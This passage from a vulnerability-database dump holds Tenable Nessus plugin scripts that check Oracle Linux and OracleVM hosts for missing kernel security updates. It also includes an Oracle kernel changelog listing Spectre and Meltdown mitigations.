script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.297.6.el6uek]\n- l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind() (Guillaume \nNault) [Orabug: 26586050] {CVE-2016-10200}\n- xfs: fix two memory leaks in xfs_attr_list.c error paths (Mateusz \nGuzik) [Orabug: 26586024] {CVE-2016-9685}\n- KEYS: Disallow keyrings beginning with '.' to be joined as session \nkeyrings (David Howells) [Orabug: 26586002] {CVE-2016-9604}\n- ipv6: fix out of bound writes in __ip6_append_data() (Eric Dumazet) \n[Orabug: 26578202] {CVE-2017-9242}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-August/007145.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-10200\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-9242\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2017-3607\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.297.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.297.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.297.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.297.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.297.6.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.297.6.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T08:50:13", "bulletinFamily": "scanner", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - l2tp: fix racy SOCK_ZAPPED flag check in\n l2tp_ip[,6]_bind (Guillaume Nault) [Orabug: 26586047]\n (CVE-2016-10200)\n\n - xfs: fix two memory leaks in xfs_attr_list.c error paths\n (Mateusz Guzik) [Orabug: 26586022] (CVE-2016-9685)\n\n - KEYS: Disallow keyrings beginning with ", "modified": "2019-12-02T00:00:00", "id": "ORACLEVM_OVMSA-2017-0144.NASL", "href": "https://www.tenable.com/plugins/nessus/102625", "published": "2017-08-21T00:00:00", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0144)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0144.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102625);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2016-10200\", \"CVE-2016-9604\", \"CVE-2016-9685\", \"CVE-2017-9242\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2017-0144)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - l2tp: fix racy SOCK_ZAPPED flag check in\n l2tp_ip[,6]_bind (Guillaume Nault) [Orabug: 26586047]\n (CVE-2016-10200)\n\n - xfs: fix two memory leaks in xfs_attr_list.c error paths\n (Mateusz Guzik) [Orabug: 26586022] (CVE-2016-9685)\n\n - KEYS: Disallow keyrings beginning with '.' to be joined\n as session keyrings (David Howells) [Orabug: 26585994]\n (CVE-2016-9604)\n\n - ipv6: fix out of bound writes in __ip6_append_data (Eric\n Dumazet) [Orabug: 26578198] (CVE-2017-9242)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-August/000758.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab2271dc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.19.4.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.19.4.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:57", "bulletinFamily": "unix", "description": "[4.1.12-61.63.1]\n- Revert 'kernel.spec: Require the new microcode_ctl.' (Brian Maly) \n- x86: Clean up IBRS functionality resident in common code (Kanth Ghatraju) [Orabug: 27439198] \n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) [Orabug: 27439198] \n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: 27439198] \n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas Gleixner) [Orabug: 27439198] \n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) [Orabug: 27439198] \n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27439198] \n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: 27439198] \n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: 27439198] \n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) {CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) [Orabug: 27439182] {CVE-2017-1000407} {CVE-2017-1000407}\n[4.1.12-61.62.1]\n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: 27386891] \n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) [Orabug: 27386891] \n- xen-blkback: pull nseg validation out in a function (Ankur Arora) [Orabug: 27386891] \n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) [Orabug: 27386891]\n[4.1.12-61.61.1]\n- x86/pti/efi: broken conversion from efi to kernel page table (Pavel Tatashin) [Orabug: 27378519] [Orabug: 27352353] {CVE-2017-5754}\n- x86/spec: Always set IBRS to guest value on VMENTER and host on VMEXIT (redux) (Konrad Rzeszutek Wilk) [Orabug: 27378474] \n- x86/IBRS: Make sure we restore MSR_IA32_SPEC_CTRL to a valid value (Boris Ostrovsky) [Orabug: 27378115] \n- x86/IBRS/IBPB: Set sysctl_ibrs/ibpb_enabled properly (Boris Ostrovsky) [Orabug: 27382622] \n- x86/spec_ctrl: Add missing 'lfence' when IBRS is not supported. (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/entry_64: TRACE_IRQS_OFF before re-enabling. (Jamie Iles) [Orabug: 27345850] {CVE-2017-5715}\n- ptrace: remove unlocked RCU dereference. (Jamie Iles) [Orabug: 27345850] {CVE-2017-5715}\n- x86/ia32: Adds code hygiene for 32bit SYSCALL instruction entry. (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/ia32: dont save registers on audit call (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec/ia32: Sprinkle IBRS and RSB at the 32-bit SYSCALL (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/ia32: Move STUFF_RSB And ENABLE_IBRS (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec: Always set IBRS to guest value on VMENTER and host on VMEXIT. (Konrad Rzeszutek Wilk) [Orabug: 27365614] {CVE-2017-5715}\n- x86/ia32: save and clear registers on syscall. (Jamie Iles) [Orabug: 27371760] {CVE-2017-5754}\n- x86/IBRS: Save current status of MSR_IA32_SPEC_CTRL (Boris Ostrovsky) [Orabug: 27371757] \n- pti: Rename X86_FEATURE_KAISER to X86_FEATURE_PTI (Pavel Tatashin) [Orabug: 27371653] {CVE-2017-5754}\n- x86/spec_ctrl: Add missing IBRS_DISABLE (Konrad Rzeszutek Wilk) \n- Make use of ibrs_inuse consistent. (Jun Nakajima) \n- x86/kvm: Set IBRS on VMEXIT if guest disabled it. (Konrad Rzeszutek Wilk) \n- Re-introduce clearing of r12-15, rbp, rbx (Kris Van Hees) [Orabug: 27345850] {CVE-2017-5715}\n- x86: more ibrs/pti fixes (Pavel Tatashin) [Orabug: 27371653] {CVE-2017-5754}\n- x86/spec: Actually do the check for in_use on ENABLE_IBRS (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- kvm: svm: Expose the CPUID.0x80000008 ebx flag. (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86/spec_ctrl: Provide the sysfs version of the ibrs_enabled (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86: Use better #define for FEATURE_ENABLE_IBRS and 0 (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86: Instead of 0x2, 0x4, and 0x1 use #defines. (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- kpti: Disable when running under Xen PV (Konrad Rzeszutek Wilk) [Orabug: 27371653] {CVE-2017-5754}\n- x86: Dont ENABLE_IBRS in nmi when we are still running on user cr3 (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86/enter: Use IBRS on syscall and interrupts - fix ia32 path (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n- x86: Fix spectre/kpti integration (Konrad Rzeszutek Wilk) [Orabug: 27371653] {CVE-2017-5754}\n- PTI: unbreak EFI old_memmap (Jiri Kosina) [Orabug: 27371653] {CVE-2017-5754}\n- KAISER KABI tweaks. (Martin K. Petersen) [Orabug: 27371653] {CVE-2017-5754}\n- x86/ldt: fix crash in ldt freeing. (Jamie Iles) [Orabug: 27371653] {CVE-2017-5754}\n- x86/entry: Define 'cpu_current_top_of_stack' for 64-bit code (Denys Vlasenko) [Orabug: 27371653] {CVE-2017-5754}\n- x86/entry: Remove unused 'kernel_stack' per-cpu variable (Denys Vlasenko) [Orabug: 27371653] {CVE-2017-5754}\n- x86/entry: Stop using PER_CPU_VAR(kernel_stack) (Denys Vlasenko) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: Set _PAGE_NX only if supported (Guenter Roeck) [Orabug: 27371653] {CVE-2017-5754}\n- x86/vdso: Get pvclock data from the vvar VMA instead of the fixmap (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- KPTI: Report when enabled (Kees Cook) [Orabug: 27371653] {CVE-2017-5754}\n- KPTI: Rename to PAGE_TABLE_ISOLATION (Kees Cook) [Orabug: 27371653] {CVE-2017-5754}\n- x86/kaiser: Move feature detection up (Borislav Petkov) [Orabug: 27371653] {CVE-2017-5754}\n- x86/kaiser: Reenable PARAVIRT (Borislav Petkov) [Orabug: 27371653] {CVE-2017-5754}\n- x86/paravirt: Dont patch flush_tlb_single (Thomas Gleixner) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: kaiser_flush_tlb_on_return_to_user() check PCID (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: asm/tlbflush.h handle noPGE at lower level (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: drop is_atomic arg to kaiser_pagetable_walk() (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: use ALTERNATIVE instead of x86_cr3_pcid_noflush (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- x86/kaiser: Check boottime cmdline params (Borislav Petkov) [Orabug: 27371653] {CVE-2017-5754}\n- x86/kaiser: Rename and simplify X86_FEATURE_KAISER handling (Borislav Petkov) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: add 'nokaiser' boot option, using ALTERNATIVE (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: fix unlikely error in alloc_ldt_struct() (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: _pgd_alloc() without __GFP_REPEAT to avoid stalls (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: paranoid_entry pass cr3 need to paranoid_exit (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: x86_cr3_pcid_noflush and x86_cr3_pcid_user (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: PCID 0 for kernel and 128 for user (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: load_new_mm_cr3() let SWITCH_USER_CR3 flush user (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: enhanced by kernel and user PCIDs (Dave Hansen) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: vmstat show NR_KAISERTABLE as nr_overhead (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: delete KAISER_REAL_SWITCH option (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: name that 0x1000 KAISER_SHADOW_PGD_OFFSET (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: cleanups while trying for gold link (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: kaiser_remove_mapping() move along the pgd (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: tidied up kaiser_add/remove_mapping slightly (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: tidied up asm/kaiser.h somewhat (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: ENOMEM if kaiser_pagetable_walk() NULL (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: fix perf crashes (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: fix regs to do_nmi() ifndef CONFIG_KAISER (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: KAISER depends on SMP (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: fix build and FIXME in alloc_ldt_struct() (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: stack map PAGE_SIZE at THREAD_SIZE-PAGE_SIZE (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: do not set _PAGE_NX on pgd_none (Hugh Dickins) [Orabug: 27371653] {CVE-2017-5754}\n- kaiser: merged update (Dave Hansen) [Orabug: 27371653] {CVE-2017-5754}\n- KAISER: Kernel Address Isolation (Richard Fellner) [Orabug: 27371653] {CVE-2017-5754}\n- x86/boot: Add early cmdline parsing for options with arguments (Tom Lendacky) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm/64: Fix reboot interaction with CR4.PCIDE (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Enable CR4.PCIDE on supported systems (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Add the 'nopcid' boot option to turn off PCID (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Disable PCID on 32-bit kernels (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Remove the UP asm/tlbflush.h code, always use the (formerly) SMP code (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Reimplement flush_tlb_page() using flush_tlb_mm_range() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Make flush_tlb_mm_range() more predictable (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Remove flush_tlb() and flush_tlb_current_task() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/vm86/32: Switch to flush_tlb_mm_range() in mark_screen_rdonly() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/irq: Do not substract irq_tlb_count from irq_call_count (Aaron Lu) [Orabug: 27371653] {CVE-2017-5754}\n- sched/core: Idle_task_exit() shouldnt use switch_mm_irqs_off() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- ARM: Hide finish_arch_post_lock_switch() from modules (Steven Rostedt) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm, sched/core: Turn off IRQs in switch_mm() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm, sched/core: Uninline switch_mm() (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Build arch/x86/mm/tlb.c even on !SMP (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- sched/core: Add switch_mm_irqs_off() and use it in the scheduler (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- mm/mmu_context, sched/core: Fix mmu_context.h assumption (Ingo Molnar) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: If INVPCID is available, use it to flush global mappings (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Add a 'noinvpcid' boot option to turn off INVPCID (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Fix INVPCID asm constraint (Borislav Petkov) [Orabug: 27371653] {CVE-2017-5754}\n- x86/mm: Add INVPCID helpers (Andy Lutomirski) [Orabug: 27371653] {CVE-2017-5754}\n- x86/ibrs: Remove 'ibrs_dump' and remove the pr_debug (Konrad Rzeszutek Wilk) [Orabug: 27351388] \n- kABI: Revert kABI: Make the boot_cpu_data look normal (Konrad Rzeszutek Wilk) {CVE-2017-5715}\n[4.1.12-61.60.1]\n- userns: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- udf: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- net: mpls: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- fs: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- ipv6: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- ipv4: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- Thermal/int340x: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- cw1200: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- qla2xxx: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- p54: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- carl9170: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- uvcvideo: prevent speculative execution (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- bpf: prevent speculative execution in eBPF interpreter (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- locking/barriers: introduce new observable speculation barrier (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- x86/cpu/AMD: Remove now unused definition of MFENCE_RDTSC feature (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- x86/cpu/AMD: Make the LFENCE instruction serialized (Elena Reshetova) [Orabug: 27345857] {CVE-2017-5753}\n- kABI: Make the boot_cpu_data look normal. (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- kernel.spec: Require the new microcode_ctl. (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715} {CVE-2017-5715}\n- x86/microcode/AMD: Add support for fam17h microcode loading (Tom Lendacky) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec_ctrl: Disable if running as Xen PV guest. (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- Set IBPB when running a different VCPU (Dave Hansen) [Orabug: 27345850] {CVE-2017-5715}\n- Clear the host registers after setbe (Jun Nakajima) [Orabug: 27345850] {CVE-2017-5715}\n- Use the ibpb_inuse variable. (Jun Nakajima) [Orabug: 27345850] {CVE-2017-5715}\n- KVM: x86: add SPEC_CTRL to MSR and CPUID lists (Andrea Arcangeli) [Orabug: 27345850] {CVE-2017-5715}\n- kvm: vmx: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Paolo Bonzini) [Orabug: 27345850] {CVE-2017-5715}\n- Use the 'ibrs_inuse' variable. (Jun Nakajima) [Orabug: 27345850] {CVE-2017-5715}\n- kvm: svm: add MSR_IA32_SPEC_CTRL and MSR_IA32_PRED_CMD (Andrea Arcangeli) [Orabug: 27345850] {CVE-2017-5715}\n- x86/svm: Set IBPB when running a different VCPU (Paolo Bonzini) [Orabug: 27345850] {CVE-2017-5715}\n- x86/kvm: Pad RSB on VM transition (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/cpu/AMD: Add speculative control support for AMD (Tom Lendacky) [Orabug: 27345850] {CVE-2017-5715}\n- x86/microcode: Recheck IBRS and IBPB feature on microcode reload (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86: Move IBRS/IBPB feature detection to scattered.c (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec_ctrl: Add lock to serialize changes to ibrs and ibpb control (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- x86/spec_ctrl: Add sysctl knobs to enable/disable SPEC_CTRL feature (Konrad Rzeszutek Wilk) [Orabug: 27345850] {CVE-2017-5715}\n- x86/kvm: clear registers on VM exit (Tom Lendacky) [Orabug: 27345850] {CVE-2017-5715}\n- x86/kvm: Set IBPB when switching VM (Tim Chen) [Orabug: 27345850] {CVE-2017-5715}\n- *INCOMPLETE* x86/syscall: 